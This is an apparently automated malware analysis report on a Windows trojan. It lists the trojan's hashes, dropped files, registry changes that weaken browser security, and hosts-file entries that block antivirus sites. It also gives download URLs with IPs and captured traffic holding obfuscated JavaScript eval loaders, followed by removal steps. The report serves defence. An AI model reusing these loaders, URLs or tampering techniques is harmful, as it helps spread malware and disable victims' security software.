Skip to main content

Trojan.Microfake.D_2536732094


Trojan.Win32.MicroFake.ba (Kaspersky), Trojan.Microfake.D (B) (Emsisoft), Trojan.Microfake.D (AdAware), DDoS.Win32.Nitol.FD, mzpefinder_pcap_file.YR, DDoSNitol.YR (Lavasoft MAS)Behaviour: Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: 2536732094c2c9599eda58d7feb40ffa

SHA1: 6bbd5e533f155313736b6b5532933fa01ffce621

SHA256: dc61adbc3391193e93e2f215a8940f68def389b4da6c40db4ba4029e6b1a6f1c

SSDeep: 768:JojY9PKLeWmM1gJb9MCq5L4UZoayHJojY9P:8miLeW3iV9M7ToayH8m

Size: 45056 bytes

File type: DLL

Platform: WIN32

Entropy: Not Packed

PEID: UPolyXv05_v6

Company: no certificate found

Created at: 2010-06-08 12:59:36

Analyzed on: WindowsXP SP3 32-bit

Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

taskkill.exe:2984
kmokq.exe:1948
auiay.exe:2924
regsvr32.exe:1680
hrl1.tmp:1736

The Trojan injects its code into the following process(es):

QQExtrenal.exe:3124
svchost.exe:592

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process QQExtrenal.exe:3124 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%System%\drivers\etc\hosts (898 bytes)

The process kmokq.exe:1948 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\»ÊÕߣ¸£°ÐÇÍõºÏ»÷[1].htm (827 bytes)
%WinDir%\Temp\rhdkm.htm (826 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\Ò«»Ô´«Ææ[1].htm (4591 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\ÍõÕßÍøÂç[1].htm (984 bytes)
%WinDir%\Temp\rbrkm.htm (2361 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\¹âÃ÷ºÏ»÷[2].rar (1338 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\ÍõÕßÍøÂç[1].htm (1678 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\ÍõÕßÍøÂç[2].htm (803 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\¹âÃ÷ºÏ»÷[1].rar (14456 bytes)
%WinDir%\Temp\rkrkm.htm (11918 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\²ÆÉñ¢áÐÇ[1].rar (782 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\²ÆÉñ¢áÐÇ[1].rar (1338 bytes)
%WinDir%\Temp\rqckm.htm (768 bytes)
%WinDir%\Temp\rbbkm.htm (753 bytes)
%WinDir%\Temp\rqrkm.htm (984 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\Ò«»Ô´«Ææ[1].htm (0 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\ÍõÕßÍøÂç[1].htm (0 bytes)
%WinDir%\Temp\rbrkm.htm (0 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\ÍõÕßÍøÂç[2].htm (0 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\²ÆÉñ¢áÐÇ[1].rar (0 bytes)
%WinDir%\Temp\rqckm.htm (0 bytes)
%WinDir%\Temp\rbbkm.htm (0 bytes)

The process auiay.exe:2924 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%System%\jarinet\QQExtrenal.exe (28 bytes)

The process regsvr32.exe:1680 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\hrl1.tmp (37 bytes)

The process hrl1.tmp:1736 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%System%\eeeaea.exe (37 bytes)

Registry activity

The process taskkill.exe:2984 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 08 D2 FB 94 FD AB 8F 98 AC 29 24 EC 26 BE 0D"

The process QQExtrenal.exe:3124 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D D0 14 E4 90 FF 3C 3D 7B 92 F8 24 71 E9 26 09"

The process kmokq.exe:1948 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 2F F6 14 EA 05 78 02 2B 52 48 36 B7 61 EF 55"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 05 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process auiay.exe:2924 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AE F9 8D B5 8A FE 0B 5E 5C 26 7F 38 09 54 84 34"

The process regsvr32.exe:1680 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "20 FF F2 9B 4E D6 40 84 48 CC 58 18 B0 C7 B1 92"

The process hrl1.tmp:1736 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "28 D4 FF E2 C1 93 0F 10 63 F9 10 91 E3 8E AD 6E"

[HKLM\System\CurrentControlSet\Services\Nationalxwn]
"Description" = "Provideskdx a domain server for NI security."

Dropped PE files

MD5 File path
9df9a9eba8026ee00bde7291adf9e9f7c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\139869[1].exe
9df9a9eba8026ee00bde7291adf9e9f7c:\WINDOWS\Temp\kmokq.exe
0e95eca14e441eacc29fecce47be107ec:\WINDOWS\system32\eeeaea.exe

HOSTS file anomalies

The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses. The modified file is 898 bytes in size. The following strings are added to the hosts file listed below:

127.0.0.1www.ijinshan.com
127.0.0.1www.360.cn
127.0.0.1www.rising.com.cn
127.0.0.1www.ijinshan.com
127.0.0.1kaba365.com


Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    taskkill.exe:2984
    kmokq.exe:1948
    auiay.exe:2924
    regsvr32.exe:1680
    hrl1.tmp:1736

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %System%\drivers\etc\hosts (898 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\»ÊÕߣ¸£°ÐÇÍõºÏ»÷[1].htm (827 bytes)
    %WinDir%\Temp\rhdkm.htm (826 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\Ò«»Ô´«Ææ[1].htm (4591 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\ÍõÕßÍøÂç[1].htm (984 bytes)
    %WinDir%\Temp\rbrkm.htm (2361 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\¹âÃ÷ºÏ»÷[2].rar (1338 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\ÍõÕßÍøÂç[1].htm (1678 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\ÍõÕßÍøÂç[2].htm (803 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\¹âÃ÷ºÏ»÷[1].rar (14456 bytes)
    %WinDir%\Temp\rkrkm.htm (11918 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\²ÆÉñ¢áÐÇ[1].rar (782 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\²ÆÉñ¢áÐÇ[1].rar (1338 bytes)
    %WinDir%\Temp\rqckm.htm (768 bytes)
    %WinDir%\Temp\rbbkm.htm (753 bytes)
    %WinDir%\Temp\rqrkm.htm (984 bytes)
    %System%\jarinet\QQExtrenal.exe (28 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\hrl1.tmp (37 bytes)
    %System%\eeeaea.exe (37 bytes)

  4. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts): 127.0.0.1 localhost
  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text4096286030723.84485c9b6b9fbded3d4764666702b145428d1
.rdata8192250525603.360566951ee1a0ff3a7f5a44727b4713506a3
.data1228867200d41d8cd98f00b204e9800998ecf8427e
.rsrc1638437524378884.14739e57c1612c8a595a9ef275334498299d5
.reloc573444945123.52939cfa8d04dd000bb30ab126902176ed40d

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:


Total found: 1
405e5da7e3d520ec6da9568f2703d7e5

Network Activity

URLs

URL IP
hxxp://www.yao933.com/271342303367272317273367.rar?rkrkm115.238.241.109
hxxp://www.zz12320.com/273312325337243270243260320307315365272317273367.rar?rbrkm60.190.218.179
hxxp://www.86jfw.com/262306311361242341320307.rar?rbrkm113.17.169.8
hxxp://180.ghyyy.com/322253273324264253306346.rar?rbrkm124.232.152.41
hxxp://yuvip.s.3322.net/315365325337315370302347.rar?rqrkm
hxxp://180.ghyyy.com/322253273324264253306346.rar?rbbkm124.232.152.41
hxxp://180.ghyyy.com/322253273324264253306346.rar?rqckm124.232.152.41
hxxp://yuvip.s.3322.net/315365325337315370302347.rar?rhdkm
hxxp://180.ghyyy.com/322253273324264253306346.rar?rkckm124.232.152.41
hxxp://yuvip.s.3322.net/315365325337315370302347.rar?rnekm
hxxp://www.30wz.com/.........rar?rqrkm183.60.200.175
hxxp://www.30wz.com/.........rar?rhdkm183.60.200.175
hxxp://180.ghyyy.com/.........rar?rbrkm124.232.152.41
hxxp://www.yao933.com/.........rar?rkrkm115.238.241.109
hxxp://180.ghyyy.com/.........rar?rqckm124.232.152.41
hxxp://www.86jfw.com/.........rar?rbrkm113.17.169.8
hxxp://180.ghyyy.com/.........rar?rbbkm124.232.152.41
hxxp://www.zz12320.com/.................rar?rbrkm60.190.218.179
dk.23145.com124.232.141.61
www.sj1516.com61.174.41.74
623968.6600.org124.232.158.38
www.mojimojimojimoji.com69.46.84.61
176.jiu75.com61.174.42.79
1.iqq21.com61.174.40.214

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /.........rar?rbrkm HTTP/1.0

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.86jfw.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Length: 9337155

Content-Type: application/octet-stream

Last-Modified: Sun, 16 Nov 2014 12:36:11 GMT

Accept-Ranges: bytes

ETag: "7cee72e7991d01:29b"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Mon, 17 Nov 2014 12:11:12 GMT

Connection: keep-alive

Rar!.....s...........Zt..@..x.. .....Y....pE.3.. ............exe..j"^yh$.f..exe...L-.....X.P......8....y8..n..t.....Gt...d..?%...../.B&........k;...x.. .....>......x.....~?.4v.4..#$~....B. 3..k{c#z.P...[[c.....{.X.7........."..../.$]..y.6.....o..L.....Z..[E.2....:.s.V.$...D..1...../c._.;j[.2..mK........z#..........e'..m.....?..{3./.W...SP..'...~.....s........h...f...\..A..G........?.V.....a....c.........O....A/....P...5....._......V.........#.W..&. ........n...7...........J....t.......0..............'T2..O`...Eo..].U.......5%o.L...>*.h...N.^..C.b.\T`.x ..........[XW`......B....8n...<a.x.....,..Az.."CW..^MD...-.F.....q... ....;.Z...@.....;.. ....U...O.}o...2.@.(...M2..k.. o.n.{.^..f7..9......T.BqO....s..@..&.ou.............cOy&.....W,.j4.......g..'..<...........B8.)..$IH}Iw:.w...@...l.....q.GE]a...c....-fT_p"b#6...._>>.tl_.d.....'.sy.#...;.....5..<....0.....`........8T....e6.e.52.....LG....5..Z...y"RU..|...{6........g..H.l~.C{.....o.........@...3.^m.7.St..j*..:...3.........W"o-..c...N...s.R....{C..... .WrP......!.dbJ.... .K:.w...m........Y.\....u.n..b.=.".....h....p.....7|2.t....n....op...[..s!."....<|.s[...=T.X9q. `....9..-P&...g./. ..H6..h.r.>k...@.THTTP/1.1 200 OK..Content-Length: 9337155..Content-Type: application/octet-stream..Last-Modified: Sun, 16 Nov 2014 12:36:11 GMT..Accept-Ranges: bytes..ETag: "7cee72e7991d01:29b"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Mon, 17 Nov 2014 12:11:12 GMT..Connection: keep-alive..Rar!.....s...........Zt..@..x.. .....Y....pE.3.. ..

<<< skipped >>>

GET /.........rar?rbrkm HTTP/1.0

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 180.ghyyy.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: safeshield/v2

Content-Length: 768

Content-Type: text/html; charset=gb2312

Pragma: no-cache

Cache-control: no-store

Expires: Thu, 01 Dec 1994 16:00:00 GMT

Connection: Close

Set-Cookie: ssfwkey=actzmz

<script>function bvtjkXR(nJeN){var m;var R;m="";for(var d=0;d<nJeN.length;d ){R=nJeN.charCodeAt(d)^31;m =String.fromCharCode(R^30);}return m;}function nsrqnFX(){var bMlC = document.getElementById("iAyX").value;var hYqC=oqehmWE();window.location=bvtjkXR(hYqC) bMlC;}function dnnybXT(){var w="107,53,104,52,53";return eval("String.fromCharCode(" w ")");}function oqehmWE(){var w="46,62,114,114,103,118,106,100,120,60,120,56,107,56,53";return eval("String.fromCharCode(" w ")");}</script><html><br><br><br><center><h3><font color="#3C3C3C">..............:</font><font color="blue"><script>var zWvP=dnnybXT();document.write(bvtjkXR(zWvP));</script> </font><input id="iAyX"> <input type=button value="................" onmouseup="nsrqnFX()"><br><br></h3><center></html>HTTP/1.1 200 OK..Server: safeshield/v2..Content-Length: 768..Content-Type: text/html; charset=gb2312..Pragma: no-cache..Cache-control: no-store..Expires: Thu, 01 Dec 1994 16:00:00 GMT..Connection: Close..Set-Cookie: ssfwkey=actzmz..<script>function cvlmcUT(){var t="46,62,114,114,103,118,106,100,120,60,120,56,107,56,53";return eval("String.fromCharCode(" t ")");}function sngerDA(xLcU){var u;var M;u="";for(var g=0;g<xLcU.length;g ){M=xLcU.charCodeAt(g)^19;u =String.fromCharCode(M^18);}return u;}function qmgdjJT(){var t="107,53,104,52,53";return eval("String.fromCharCode(" t ")");}function ikxwqYV(){var qLxW = document.getEl

<<< skipped >>>

GET /.........rar?rkrkm HTTP/1.0

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.yao933.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Length: 3263917

Content-Type: application/octet-stream

Last-Modified: Mon, 10 Nov 2014 12:58:28 GMT

Accept-Ranges: bytes

ETag: "1010c15e6fccf1:304"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Mon, 17 Nov 2014 12:11:25 GMT

Connection: keep-alive

Rar!.....s...........8t..?.S.1...3...g`...jE.3.. ............exe.QiI.f.T...exe..T.*..U.......0. .TQP@@D@I..#A%..@Hs.H0p....D..A.......A"HU H.TQ..1.O.<....A..^..^.......|.I.2......*.......n...V....U.f../...Z..t!(O.'..&......a<&.'.........w.,N(....203s{....-..\....E...7...o.M............B}..uS.Y$........~..o....P....]'.6.0....../...?...PC..}.h....&..H.HS..\..~.?n.Q..G......N.<.h...........\.'.M.....=?L.E.y.>...........z.F.}.@.....B..-....?.C...MF.....k...[....:.F.f%...z>..q. 6}.O.................e.Y..kh.....;...?.."...s........ .:/..<....O!....,i<.[.2(*tO. ..q..9Yw..$ej.V)*^.9....omi.o..8....Z.yy|.sc.....;,. .:c...C~o....Q.R)..z...^.V...x.|vj..3..J."n.I..s).....#..II...)n....t..p..Dk=.NH.%1....-.0i.vx....k..[...N.n.(..9;....F'9......8..D.0.50.*...lZ....%&....d.. ..}.#2........vW.[......G[ua......T........-MH';..cl.v*k9.G..Ng.;.E..........Kf...X8XBo. w.C......?/y......nY.U.~8.u....s.q.u. .|...=.~s....b...i..........]..S.y..|(...3.^.$.....x.....i.3...........E.1.|......l......z......3.{..........79.^})r.W.5....J...-l..r){.....Sb`.U.}..y..kY..cj.hbk...\Ojt..i....7.d[..Vg2....|.x.......>../s....3..a...v....#B6...o.Z..RW.*v}.eki...sC.....x...xT..?......=..b.2...r...........Y.c.~....t.3.i..])|#m.6...Z...p.Qz.vH. ..ye....lrt...T...1 6.....fbj.W....yUce1B.9=P...cfd...TX....k..[...{-.........f..{h....1}....*......ORu(.../6.......Rw.....:.j..~....E..O.?'d.N.c...k.u.^.,.j../H...8.....!.*J...A...%..[x.5G........p..).Ss.t..@:...:..|...tX.0..o..n.....]...`B5..w... .O"...Wrim..../...CH....o..SP..M.-/B]..

<<< skipped >>>

GET /.........rar?rqrkm HTTP/1.0

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.30wz.com

Connection: Keep-Alive

HTTP/1.0 200 OK

Content-Type: text/html

Content-Length: 98

Pragma: no-cache

Cache-control: no-store

<html><body><script>var gp="/........",hp="djfz2",kp,ip=new Array(),jp;function ep(fp){for(kp=0;kp<jp.length;kp )ip[kp]=jp.charCodeAt(kp);kp="kp=4;for(;kp<=53;){ip[kp]=(((((ip[kp]^102)<<3)&0xff)|((ip[kp]^102)>>5))>>5)|((((((ip[kp]^102)<<3)&0xff)|((ip[kp]^102)>>5))<<3)&0xff);kp ;}";eval(kp);kp="kp=53;do{if(kp<3)break;ip[kp]=(((((ip[kp] 229)&0xff)-109)&0xff)>>3)|((((((ip[kp] 229)&0xff)-109)&0xff)<<5)&0xff);kp--;}while(true);";eval(kp);kp=1;while(kp<=51){ip[kp]=(((((ip[kp] 169)&0xff)>>7)|((((ip[kp] 169)&0xff)<<1)&0xff))>>6)|((((((ip[kp] 169)&0xff)>>7)|((((ip[kp] 169)&0xff)<<1)&0xff))<<2)&0xff);kp ;}jp="";for(kp=1;kp<ip.length-1;kp )if(kp%5)jp =String.fromCharCode(ip[kp]^fp);kp=eval;kp(jp);}jp="hO\x92\x19:!\x0en\x01\x1a^\x0e>6zu\x16\x0e\x02E\xc7.j\x1d1/\x01r6r\x04MrvrB\x1e\x06!\x12\xf1:\x22n\x1e\x0e&VE:Y1\xf7_\xc0 ";ep(176);</script><script>var u=2;for(;u==1;u );</script><br><br><br><center><h3><p>..............................JavaScript</p></h3></center></body></html>HTTP/1.0 200 OK..Content-Type: text/html..Content-Length: 984.Pragma: no-cache..Cache-control: no-store..<html><body><script>var gp="/........",hp="djfz2",kp,ip=new Array(),jp;function ep(fp){for(kp=0;kp<jp.length;kp )ip[kp]=jp.charCodeAt(kp);kp="kp=4;for(;kp<=53;){ip[kp]=(((((ip[kp]^102)<<3)&0xff)|((ip[kp]^102)&g

<<< skipped >>>

GET /.........rar?rkrkm HTTP/1.0

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.yao933.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Length: 3263917

Content-Type: application/octet-stream

Last-Modified: Mon, 10 Nov 2014 12:58:28 GMT

Accept-Ranges: bytes

ETag: "1010c15e6fccf1:304"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Mon, 17 Nov 2014 12:11:26 GMT

Connection: keep-alive

Rar!.....s...........8t..?.S.1...3...g`...jE.3.. ............exe.QiI.f.T...exe..T.*..U.......0. .TQP@@D@I..#A%..@Hs.H0p....D..A.......A"HU H.TQ..1.O.<....A..^..^.......|.I.2......*.......n...V....U.f../...Z..t!(O.'..&......a<&.'.........w.,N(....203s{....-..\....E...7...o.M............B}..uS.Y$........~..o....P....]'.6.0....../...?...PC..}.h....&..H.HS..\..~.?n.Q..G......N.<.h...........\.'.M.....=?L.E.y.>...........z.F.}.@.....B..-....?.C...MF.....k...[....:.F.f%...z>..q. 6}.O.................e.Y..kh.....;...?.."...s........ .:/..<....O!....,i<.[.2(*tO. ..q..9Yw..$ej.V)*^.9....omi.o..8....Z.yy|.sc.....;,. .:c...C~o....Q.R)..z...^.V...x.|vj..3..J."n.I..s).....#..II...)n....t..p..Dk=.NH.%1....-.0i.vx....k..[...N.n.(..9;....F'9......8..D.0.50.*...lZ....%&....d.. ..}.#2........vW.[......G[ua......T........-MH';..cl.v*k9.G..Ng.;.E..........Kf...X8XBo. w.C......?/y......nY.U.~8.u....s.q.u. .|...=.~s....b...i..........]..S.y..|(...3.^.$.....x.....i.3...........E.1.|......l......z......3.{..........79.^})r.W.5....J...-l..r){.....Sb`.U.}..y..kY..cj.hbk...\Ojt..i....7.d[..Vg2....|.x.......>../s....3..a...v....#B6...o.Z..RW.*v}.eki...sC.....x...xT..?......=..b.2...r...........Y.c.~....t.3.i..])|#m.6...Z...p.Qz.vH. ..ye....lrt...T...1 6.....fbj.W....yUce1B.9=P...cfd...TX....k..[...{-.........f..{h....1}....*......ORu(.../6.......Rw.....:.j..~....E..O.?'d.N.c...k.u.^.,.j../H...8.....!.*J...A...%..[x.5G........p..).Ss.t..@:...:..|...tX.0..o..n.....]...`B5..w... .O"...Wrim..../...CH....o..SP..M.-/B]..

<<< skipped >>>

GET /.........rar?rqrkm HTTP/1.0

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.30wz.com

Connection: Keep-Alive

HTTP/1.0 200 OK

Content-Type: text/html

Content-Length: 80

Pragma: no-cache

Cache-control: no-store

<html><body><script>var qy="/........",ry="djfz2",uy,sy=new Array(),ty;function oy(py){for(uy=0;uy<ty.length;uy )sy[uy]=ty.charCodeAt(uy);uy="uy=54;for(;;){if(uy<4)break;sy[uy]=(sy[uy]-sy[uy-1])&0xff;uy--;}";eval(uy);uy="uy=1;while(true){if(uy>56)break;sy[uy]=(sy[uy]-sy[uy 1])&0xff;uy ;}";eval(uy);uy=1;while(true){if(uy>56)break;sy[uy]=(sy[uy] sy[uy 1])&0xff;uy ;}ty="";for(uy=1;uy<sy.length-1;uy )if(uy%7)ty =String.fromCharCode(sy[uy]^py);uy=eval;uy(ty);}ty="\xa5a\r\xfe\x8e\x122;\xf8\xbeA\x8c\xab\x85*\xc8\xc7\x00\x92\x8c\xe8\xa8\x9e$\xa5\xc5\x1b\xd5\xc6\x1a5\n\xacOs\xa6X\xc9\x18\n\xe8m\x227\x9d|\xa3\x1c\xd6\x17\x9b\xed&\x11\xd9sV=\xfe";oy(20);</script><script>var u=2;for(;u==1;u );</script><br><br><br><center><h3><p>..............................JavaScript</p></h3></center></body></html>..

GET /.........rar?rbrkm HTTP/1.0

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 180.ghyyy.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: safeshield/v2

Content-Length: 766

Content-Type: text/html; charset=gb2312

Pragma: no-cache

Cache-control: no-store

Expires: Thu, 01 Dec 1994 16:00:00 GMT

Connection: Close

Set-Cookie: ssfwkey=actzmz

<script>function crhnuUL(){var s="40,56,116,116,97,112,108,98,126,58,126,62,109,62,51";return eval("String.fromCharCode(" s ")");}function hfcnwPH(xXcG){var q;var D;q="";for(var m=0;m<xXcG.length;m ){D=xXcG.charCodeAt(m)^60;q =String.fromCharCode(D^59);}return q;}function ajwpbCS(){var s="109,51,110,50,51";return eval("String.fromCharCode(" s ")");}function ddkipIH(){var yCvO = document.getElementById("nTqP").value;var xBnV=crhnuUL();window.location=hfcnwPH(xBnV) yCvO;}</script><html><br><br><br><center><h3><font color="#3C3C3C">..............:</font><font color="blue"><script>var uMqM=ajwpbCS();document.write(hfcnwPH(uMqM));</script> </font><input id="nTqP"> <input type=button value="................" onmouseup="ddkipIH()"><br><br></h3><center></html>HTTP/1.1 200 OK..Server: safeshield/v2..Content-Length: 768..Content-Type: text/html; charset=gb2312..Pragma: no-cache..Cache-control: no-store..Expires: Thu, 01 Dec 1994 16:00:00 GMT..Connection: Close..Set-Cookie: ssfwkey=actzmz..<script>function vvhxnCX(jNjP){var m;var T;m="";for(var v=0;v<jNjP.length;v ){T=jNjP.charCodeAt(v)^77;m =String.fromCharCode(T^76);}return m;}function aswkdKO(){var r="46,62,114,114,103,118,106,100,120,60,120,56,107,56,53";return eval("String.fromCharCode(" r ")");}function mcjwbAN(){var r="107,53,104,52,53";return eval("String.fromCharCode(" r ")");}function mhdvkAT(){var uNlD = document.getElem

<<< skipped >>>

GET /.........rar?rhdkm HTTP/1.0

Accept: */*

